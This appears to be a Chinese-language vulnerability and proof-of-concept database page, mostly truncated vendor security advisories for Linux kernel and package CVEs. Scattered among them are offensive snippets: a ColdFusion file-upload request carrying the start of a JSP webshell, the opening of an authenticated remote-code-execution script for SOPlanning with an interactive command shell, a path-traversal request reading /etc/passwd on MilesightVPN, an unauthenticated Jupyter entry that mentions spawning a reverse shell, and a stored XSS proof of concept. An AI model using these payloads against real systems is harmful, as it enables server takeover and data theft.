?day POC 漏洞数据库

Debian: CVE-2024-38587: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 06/19/2024 Created 06/28/2024 Added 06/27/2024 Modified 06/27/2024 Description In the Linux kernel, the following vulnerability has been resolved: speakup: Fix sizeof() vs ARRAY_SIZE() bug The "buf" pointer is an array of u16 values.This code should be using ARRAY_SIZE() (which is 256) instead of sizeof() (which is 512), otherwise it can the still got out of bounds. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2024-38587 CVE - 2024-38587 DLA-3840-1

Debian: CVE-2021-47586: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 06/19/2024 Created 07/31/2024 Added 07/30/2024 Modified 07/30/2024 Description In the Linux kernel, the following vulnerability has been resolved: net: stmmac: dwmac-rk: fix oob read in rk_gmac_setup KASAN reports an out-of-bounds read in rk_gmac_setup on the line: while (ops->regs[i]) { This happens for most platforms since the regs flexible array member is empty, so the memory after the ops structure is being read here.It seems that mostly this happens to contain zero anyway, so we get lucky and everything still works. To avoid adding…

SUSE: CVE-2021-47461: SUSE Linux Security Advisory Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 05/22/2024 Created 08/16/2024 Added 08/09/2024 Modified 08/09/2024 Description In the Linux kernel, the following vulnerability has been resolved: userfaultfd: fix a race between writeprotect and exit_mmap() A race is possible when a process exits, its VMAs are removed by exit_mmap() and at the same time userfaultfd_writeprotect() is called. The race was detected by KASAN on a development kernel, but it appears to be possible on vanilla kernels as well. Use mmget_not_zero() to prevent the race as done in other userfaultfd operations. …

Rocky Linux: CVE-2024-36978: kernel (Multiple Advisories) Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 06/19/2024 Created 08/23/2024 Added 08/22/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: net: sched: sch_multiq: fix possible OOB write in multiq_tune() q->bands will be assigned to qopt->bands to execute subsequent code logic after kmalloc. So the old q->bands should not be used in kmalloc. Otherwise, an out-of-bounds write will occur. Solution(s) rocky-upgrade-bpftool rocky-upgrade-bpftool-debuginfo rocky-upgrade-kernel rocky-upgrade-kernel-core rocky-…

VMware Photon OS: CVE-2024-38428 Severity 9 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:N) Published 06/16/2024 Created 01/21/2025 Added 01/20/2025 Modified 02/04/2025 Description url.c in GNU Wget through 1.24.5 mishandles semicolons in the userinfo subcomponent of a URI, and thus there may be insecure behavior in which data that was supposed to be in the userinfo subcomponent is misinterpreted to be part of the host subcomponent. Solution(s) vmware-photon_os_update_tdnf References https://attackerkb.com/topics/cve-2024-38428 CVE - 2024-38428

漏洞描述Adobe ColdFusion存在任意文件上传漏洞，通过漏洞攻击者可上传任意文件控制服务器。 漏洞影响Adobe ColdFusion 网络测绘app=”Adobe-ColdFusion” 漏洞复现产品官网 发送数据包上传任意文件 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1Host: User-Agent: Go-http-client/1.1 Content-Length: 918 Content-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Accept-Encoding: gzip --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Content-Disposition: form-data; name="file"; filename="b79f4282c451e975c357d9616acea7ba.jsp" Content-Type: application/octet-stream <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLo…

Alma Linux: CVE-2023-52340: Moderate: kernel security, bug fix, and enhancement update (Multiple Advisories) Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 05/22/2024 Created 06/01/2024 Added 05/31/2024 Modified 01/28/2025 Description The IPv6 implementation in the Linux kernel before 6.3 has a net/ipv6/route.c max_size threshold that can be consumed easily, e.g., leading to a denial of service (network is unreachable errors) when IPv6 packets are sent in a loop via a raw socket. Solution(s) alma-upgrade-bpftool alma-upgrade-kernel alma-upgrade-kernel-abi-stablelists alma-upgrade-kernel-core alma-upgrade-kernel-cross-headers…

FreeBSD: VID-589DE937-343F-11EF-8A7B-001B217B3468 (CVE-2024-6323): Gitlab -- Vulnerabilities Severity 8 CVSS (AV:N/AC:L/Au:N/C:C/I:N/A:N) Published 06/26/2024 Created 06/28/2024 Added 06/27/2024 Modified 01/28/2025 Description Improper authorization in global search in GitLab EE affecting all versions from 16.11 prior to 16.11.5 and 17.0 prior to 17.0.3 and 17.1 prior to 17.1.1 allows an attacker leak content of a private repository in a public project. Solution(s) freebsd-upgrade-package-gitlab-ce freebsd-upgrade-package-gitlab-ee References CVE-2024-6323

Debian: CVE-2023-23003: linux -- security update Severity 4 CVSS (AV:L/AC:H/Au:M/C:N/I:N/A:C) Published 03/01/2023 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description In the Linux kernel before 5.16, tools/perf/util/expr.c lacks a check for the hashmap__new return value. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2023-23003 CVE - 2023-23003

Huawei EulerOS: CVE-2021-47230: kernel security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 05/21/2024 Created 10/09/2024 Added 10/08/2024 Modified 10/08/2024 Description In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Immediately reset the MMU context when the SMM flag is cleared Immediately reset the MMU context when the vCPU's SMM flag is cleared so that the SMM flag in the MMU role is always synchronized with the vCPU's flag.If RSM fails (which isn't correctly emulated), KVM will bail without calling post_leave_smm() and leave the MMU in a bad state. The bad MMU role can lead to a NULL pointer…

Huawei EulerOS: CVE-2024-39509: kernel security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 07/12/2024 Created 11/27/2024 Added 11/26/2024 Modified 11/26/2024 Description In the Linux kernel, the following vulnerability has been resolved: HID: core: remove unnecessary WARN_ON() in implement() Syzkaller hit a warning [1] in a call to implement() when trying to write a value into a field of smaller size in an output report. Since implement() already has a warn message printed out with the help of hid_warn() and value in question gets trimmed with: ... value &= m; ... WARN_ON may be considered superfluous. Remove it to sup…

Debian: CVE-2021-47594: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 06/19/2024 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: mptcp: never allow the PM to close a listener subflow Currently, when deleting an endpoint the netlink PM treverses all the local MPTCP sockets, regardless of their status. If an MPTCP listener socket is bound to the IP matching the delete endpoint, the listener TCP socket will be closed. That is unexpected, the PM should only affect data subflows. Additionally, syzbot was able to trigger a NULL p…

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

Debian: CVE-2022-43441: node-sqlite3 -- security update Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/16/2023 Created 03/16/2023 Added 03/16/2023 Modified 01/28/2025 Description A code execution vulnerability exists in the Statement Bindings functionality of Ghost Foundation node-sqlite3 5.1.1. A specially-crafted Javascript file can lead to arbitrary code execution. An attacker can provide malicious input to trigger this vulnerability. Solution(s) debian-upgrade-node-sqlite3 References https://attackerkb.com/topics/cve-2022-43441 CVE - 2022-43441 DSA-5373-1

# Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS # Date: 25/02/2021 # Exploit Author: Peithon # Vendor Homepage: https://github.com/eddy8/LightCMS # Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4 # Version: 1.3.4 # Tested on: latest version of Chrome, Firefox on Windows and Linux # CVE: CVE-2021-3355 An issue was discovered in LightCMS v1.3.4.(https://github.com/eddy8/LightCMS/issues/18) There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords. --------------------------Proof of Concept----------------------- 1. Log in to the background. 2. Navigate to System …

Debian: CVE-2021-47490: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 05/22/2024 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: drm/ttm: fix memleak in ttm_transfered_destroy We need to cleanup the fences for ghost objects as well. Bug: https://bugzilla.kernel.org/show_bug.cgi?id=214029 Bug: https://bugzilla.kernel.org/show_bug.cgi?id=214447 Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2021-47490 CVE - 2021-47490

VMware Photon OS: CVE-2024-50010 Severity 4 CVSS (AV:L/AC:H/Au:S/C:N/I:N/A:C) Published 10/21/2024 Created 01/21/2025 Added 01/20/2025 Modified 02/04/2025 Description In the Linux kernel, the following vulnerability has been resolved: exec: don't WARN for racy path_noexec check Both i_mode and noexec checks wrapped in WARN_ON stem from an artifact of the previous implementation. They used to legitimately check for the condition, but that got moved up in two commits: 633fb6ac3980 ("exec: move S_ISREG() check earlier") 0fd338b2d2cd ("exec: move path_noexec() check earlier") Instead of being removed said checks are WARN_ON'ed instead, which has some…

Red Hat: CVE-2023-26767: buffer overflow in lou_logFile function at logginc.c (Multiple Advisories) Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 03/16/2023 Created 11/09/2023 Added 11/08/2023 Modified 01/28/2025 Description Buffer Overflow vulnerability found in Liblouis v.3.24.0 allows a remote attacker to cause a denial of service via the lou_logFile function at logginc.c endpoint. Solution(s) redhat-upgrade-liblouis redhat-upgrade-liblouis-debuginfo redhat-upgrade-liblouis-debugsource redhat-upgrade-liblouis-utils-debuginfo redhat-upgrade-python3-louis References CVE-2023-26767 RHSA-2023:6385

Debian: CVE-2024-43364: cacti -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 10/07/2024 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Cacti is an open source performance and fault management framework. The `title` parameter is not properly sanitized when saving external links in links.php . Morever, the said title parameter is stored in the database and reflected back to user in index.php, finally leading to stored XSS. Users with the privilege to create external links can manipulate the `title` parameter in the http post request while creating external links to perform stored XSS attacks. The vulne…

Oracle Linux: CVE-2024-31449: ELSA-2024-10869:redis:7 security update (MODERATE) (Multiple Advisories) Severity 6 CVSS (AV:L/AC:H/Au:S/C:C/I:C/A:C) Published 10/07/2024 Created 12/10/2024 Added 12/07/2024 Modified 02/05/2025 Description Redis is an open source, in-memory database that persists on disk. An authenticated user may use a specially crafted Lua script to trigger a stack buffer overflow in the bit library, which may potentially lead to remote code execution. The problem exists in all versions of Redis with Lua scripting. This problem has been fixed in Redis versions 6.2.16, 7.2.6, and 7.4.1. Users are advised to upgrade. There are no known…

Oracle Linux: CVE-2023-2194: ELSA-2023-3723:kernel security and bug fix update (IMPORTANT) (Multiple Advisories) Severity 6 CVSS (AV:L/AC:L/Au:M/C:C/I:C/A:C) Published 03/16/2023 Created 07/26/2023 Added 07/25/2023 Modified 12/06/2024 Description An out-of-bounds write vulnerability was found in the Linux kernel&apos;s SLIMpro I2C device driver. The userspace &quot;data-&gt;block[0]&quot; variable was not capped to a number between 0-255 and was used as the size of a memcpy, possibly writing beyond the end of dma_buffer. This flaw could allow a local privileged user to crash the system or potentially achieve code execution. An out-of…

Oracle Linux: CVE-2024-3657: ELSA-2024-3591:389-ds-base security update (IMPORTANT) (Multiple Advisories) Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 05/28/2024 Created 06/06/2024 Added 06/04/2024 Modified 12/07/2024 Description A flaw was found in 389-ds-base. A specially-crafted LDAP query can potentially cause a failure on the directory server, leading to a denial of service Solution(s) oracle-linux-upgrade-389-ds-base oracle-linux-upgrade-389-ds-base-devel oracle-linux-upgrade-389-ds-base-legacy-tools oracle-linux-upgrade-389-ds-base-libs oracle-linux-upgrade-389-ds-base-snmp oracle-linux-upgrade-python3-lib389 …

漏洞描述Jupyter Notebook（此前被称为 IPython notebook）是一个交互式笔记本，支持运行 40 多种编程语言。 如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令。 漏洞影响Jupyter Notebook 网络测绘app=”Jupyter-Notebook” && body=”Terminal” 漏洞复现访问目标, 点击 Terminal 打开命令行界面 执行命令并反弹shell

漏洞描述MilesightVPN 是一款软件，可使 Milesight 产品的 VPN 通道设置过程更加简便，并可通过网络服务器界面监控连接状态。其中存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中敏感文件。 漏洞影响Milesight VPN 网络测绘“MilesightVPN” 漏洞复现登陆页面 验证POC GET /../etc/passwd HTTP/1.1Host: Accept: / Content-Type: application/x-www-form-urlencoded

Microsoft Windows: CVE-2025-21410: Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Windows: CVE-2025-21410: Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Solution(s) microsoft-windows-windows_server_2012-kb5052020 microsoft-windows-windows_server_2012_r2-kb5052042 microsoft-windows-windows_server_2016-1607-kb5052006 microsoft-windows-windows_server_2019-1809-kb5052000 microsoft-windows-windows_server_2022-21h2-kb5051…